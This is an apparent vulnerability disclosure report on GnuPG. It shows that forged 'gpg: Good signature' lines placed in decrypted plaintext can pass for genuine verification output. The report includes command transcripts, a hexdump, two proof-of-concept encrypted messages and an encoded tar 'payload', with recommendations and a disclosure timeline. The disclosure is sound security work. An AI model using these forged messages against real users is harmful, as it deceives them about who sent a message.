GnuPG Output Fails To Distinguish Signature Verification Success From Message Content
An implementation flaw in how GnuPG handles encrypted messages allows an attacker to append arbitrary plaintext that looks like GnuPG log output. Because verification cannot occur without decryption, users cannot easily tell whether an encrypted message was signed or not.
Impact
Users cannot reliably verify the authenticity of encrypted messages without decrypting them to plaintext. This makes it possible for attackers to create deceptive messages that appear valid even when unsigned.
Details
Verifying the signatures fails in both cases
$ gpg --verify a
gpg: verify signatures failed: Unexpected error
$ gpg --verify b
gpg: verify signatures failed: Unexpected errorDecrypting them, however, reveals plaintext output and valid signature information:
$ gpg --decrypt a
gpg: AES256.CFB encrypted data
gpg: encrypted with 1 passphrase
abc
gpg: Signature made Thu 28 Aug 2025 02:40:32 PM CEST
gpg: using RSA key AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
gpg: Good signature from "AAAAAAAA <[email protected]>" [ultimate]
$ gpg --decrypt b
gpg: AES256.CFB encrypted data
gpg: encrypted with 1 passphrase
abc
gpg: Signature made Thu 28 Aug 2025 02:40:32 PM CEST
gpg: using RSA key AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
gpg: Good signature from "AAAAAAAA <[email protected]>" [ultimate]In both cases, GnuPG reports a valid signature, but only after decryption—preventing safe pre-verification of message authenticity.
Scenario
Bob expects a signed and encrypted message from Alice. Mallory, an active MITM lacking Alice’s keys, crafts a fake encrypted message containing arbitrary data that mimics GnuPG’s output format.
When Bob runs gpg --verify, the verification fails.
When he tries gpg --decrypt, it succeeds and prints a “Good signature” message—despite the appended plaintext being maliciously crafted. Bob, seeing a successful decryption and valid-looking signature message, assumes authenticity.
Procedure
Both --verify and --decrypt commands exit with code 0.
One message includes a genuine signature, the other forges GnuPG-style “gpg:” lines in the plaintext.
Legitimate plaintext
$ gpg --decrypt a | hexdump -C
gpg: AES256.CFB encrypted data
gpg: encrypted with 1 passphrase
gpg: Signature made Thu 28 Aug 2025 02:40:32 PM CEST
gpg: using RSA key AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
gpg: Good signature from "AAAAAAAA <[email protected]>" [ultimate]
00000000 61 62 63 0a |abc.|
00000004Appended Plaintext
$ gpg --decrypt b | hexdump -C
gpg: AES256.CFB encrypted data
gpg: encrypted with 1 passphrase
00000000 61 62 63 0a 67 70 67 3a 20 53 69 67 6e 61 74 75 |abc.gpg: Signatu|
00000010 72 65 20 6d 61 64 65 20 54 68 75 20 32 38 20 41 |re made Thu 28 A|
00000020 75 67 20 32 30 32 35 20 30 32 3a 34 30 3a 33 32 |ug 2025 02:40:32|
00000030 20 50 4d 20 43 45 53 54 0a 67 70 67 3a 20 20 20 | PM CEST.gpg: |
00000040 20 20 20 20 20 20 20 20 20 20 20 20 20 75 73 69 | usi|
00000050 6e 67 20 52 53 41 20 6b 65 79 20 41 41 41 41 41 |ng RSA key AAAAA|
00000060 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
00000070 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
00000080 41 41 41 0a 67 70 67 3a 20 47 6f 6f 64 20 73 69 |AAA.gpg: Good si|
00000090 67 6e 61 74 75 72 65 20 66 72 6f 6d 20 22 41 41 |gnature from "AA|
000000a0 41 41 41 41 41 41 20 3c 41 41 41 41 40 41 41 41 |AAAAAA <AAAA@AAA|
000000b0 41 41 2e 63 6f 6d 3e 22 20 5b 75 6c 74 69 6d 61 |AA.com>" [ultima|
000000c0 74 65 5d 0a 00 00 00 00 00 00 00 00 00 00 00 00 |te].............|
000000d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
00000250 00 00 00 00 |....|
00000254Recommendations
- Users of GnuPG should only trust program log output on stderr, and interpret stdout as message content, and explicitly separate them in order to avoid confusion.
- GnuPG should support an option to verify the presence and validity of a signature without decrypting to an output file or standard output.
- GnuPG should output a warning when
--decryptdid not verify any signatures.
Finder credits: 49016
Disclosure Timeline:
- 22.10.2025: Submission of initial version of this report.
Upcoming Timeline:
- 24.10.2025: Submission of a talk for 39th Chaos Communication Congress (39C3). No technical details shared.
- 21.12.2025: Disclosure of this report on https://seclists.org/fulldisclosure/
- 26-31.12.2025: If accepted by content team, 39C3 Congress talk regarding this report
Please note: While we might be able to offer some flexibility, our plan is to adhere to the above stated upcoming timeline, regardless of the availability of patches or fixes. Please keep us updated regarding your remediation efforts.
Thank you
Best, Liam
Incoherent Rambling
sq:
==> a <==
-----BEGIN PGP MESSAGE-----
jA0ECQMKZOBdA934tTX+0ukB/ujuiwIdJnma3N+HyGlSBFCfK3oACL6ESVSaMByN
wGGZcrFWe4lSHZcVFJKixblJK1K/jg2zzk11QUHzSlzAS2dqxp5OaB+2zENzjktN
flC0DBXhHyUp2aQJKiA6waruqPvIQNLKjxAGbkiaNUF70NDzerEn79Ag5pUaH+GR
/HynT1XMQsD07C01HasYaKmIMyG77UN0zeO+EAowEv874GuspE9GQJF7SGdoullj
UsZcmTSHzLXmfDrqdGANe8D/07KZtpRgnmLrMVD2DsAZWyMVaKrYKkAEWrOlNK/b
19ZnQwOQK3dKOGRJaujERIl2JsBD2MCWQ6O8QcxklfLY4IyFkEzb8O+E7Zor044p
o5D6Io8zk8q/T3639Gq8hqq5BO5A2G0x3mAO4JjNZ8QzmiUU294mPNiV3VBgR9VC
k99k8zqrMOVkvUqbjQyT5LpR0LqZldKDsPPFOBF8cF4KleJsWorvnYXdEz+hvPoK
xCtiumH0lZSyXIhwXnontfNa6GCCy+Nw0KtGMyMqT+aoodV7cCS+WsdZuy97vqS4
+C9LiIHla0c+kWW5dQRD8hnC01Ty7KZX+17V13ZSudpsTEtYYkztltXRUvuQNC4H
hD09MppwfmfHwZ6LD+ZOQeynBfp2a99w9KFzM7PqWK0mRFSuGwm/NaezD0Wft/WE
iIHrAzPxoId0nulrnKzfl9IGKV+2HKOdlvhVYS2HV3GYZi7fJT8/DC1QHzuKuXFi
zs3Arg+LzrRRKnurmWD2Nr213weOpmGFHRkkQRP9TRt9n3u/s7RVYsgMHKCxKwKF
PyvtyO4B6J/66Bihq+tCkp2s4PB+agxDvPoXnC/sa159nc4=
=7Pq0
-----END PGP MESSAGE-----
==> b <==
-----BEGIN PGP MESSAGE-----
jA0ECQMK+oXIwFtNZvv+0ukBomNWnXD9KSiJZe64IDUz+OYEf4qaX/WzDla6x5gb
hzY1nh5tUzrVcVT0rpXHD0EI9eRsLFdyG7Cvdv9tSj/WVCCBQ7J+kRN0iEchCkgF
gPjLCnvz09VlSbpDtzyL976NjRMk8H+G7hKUtPuk4HXZhL9QZSsufSyfkW4uMeRx
BaxxHD2M5CKTxIfDCZR8w1S3/eMQUnHoXTRcgtQiJJBd2o169WGoMgDbFbdfYeDw
UE/gFpu2e0zEoMuVRbKOhd9ih7sZFtWE9AvkJCmO4p5pHGuIYbJNMWqBbPpSgO8Q
/3QuXY2yIYgcamBsCfrBGC9+iAC35NRizZqf27itxxPjHoL7lA05FHyeRuOtWz/W
2KlygdcTLXt2iT+2n1rJ+/GqmzZCT7vfml+3KwUB47t/3trkhxAitu2Fsbpb/uhj
rqgE9yaEvZbLQnDDpNfAbxAZ69+Wro524D1G/tk18v9cNv4b0Xp1+DI9h40vAEWZ
XLloCeFRTJ9HsAlNXCIgSvb3tEB55wqqX3pVZ2NKDGToBZ48n4FYw+7/2HiTfkdh
eKgxODXShCjxC2lO75zoSfzOBuY1PQzgOmXB48JY18lQsTrzz6fQV6gZPntHcZeI
3kWOwyHCHZV879fXkvyEJKOgp9S+nYFz4hUfO49kNeMsakPnUCJCEnZaNjhXtoqX
W6aOMVzFQc+G1edySoZzCVV7fvuIV0mpyCXT8G9LoBeegi6DqY2EPLq2VJ0J6IjG
TB1+Qum7JR4e74oTTYFxJqEHVLmziq7Ouaow5XNz5i8a3vsKALPGYW8mt9/VGjPI
KRnnO4AzwAHrhvK9OEqE6zvxyTRRSVj1M9cri+yN5cQo4bo8AxMY7jqa7+q8m3cn
GFwa79KoeSZaEawXTieMo+e1LMQ1S7h/
=gmHK
-----END PGP MESSAGE-----Impact
A normal user cannot easily verify if an encrypted message has been verified correctly
$ gpg --verify a
gpg: verify signatures failed: Unexpected error
$ gpg --verify b
gpg: verify signatures failed: Unexpected error
$ gpg --decrypt a
gpg: AES256.CFB encrypted data
gpg: encrypted with 1 passphrase
abc
gpg: Signature made Thu 28 Aug 2025 02:40:32 PM CEST
gpg: using RSA key D063593DBA72EA735B2344B7B23ADC47086BEFBA
gpg: Good signature from "signer" [ultimate]
$ gpg --decrypt b
gpg: AES256.CFB encrypted data
gpg: encrypted with 1 passphrase
abc
gpg: Signature made Thu 28 Aug 2025 02:40:32 PM CEST
gpg: using RSA key D063593DBA72EA735B2344B7B23ADC47086BEFBA
gpg: Good signature from "signer" [ultimate] Both exit with exit status 0. One of them has a signature, the other has “gpg: ” lines in the plaintext. (are we deadass??)
example payload as .tar.b64:
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
ffwHuCKCaQAoAAA=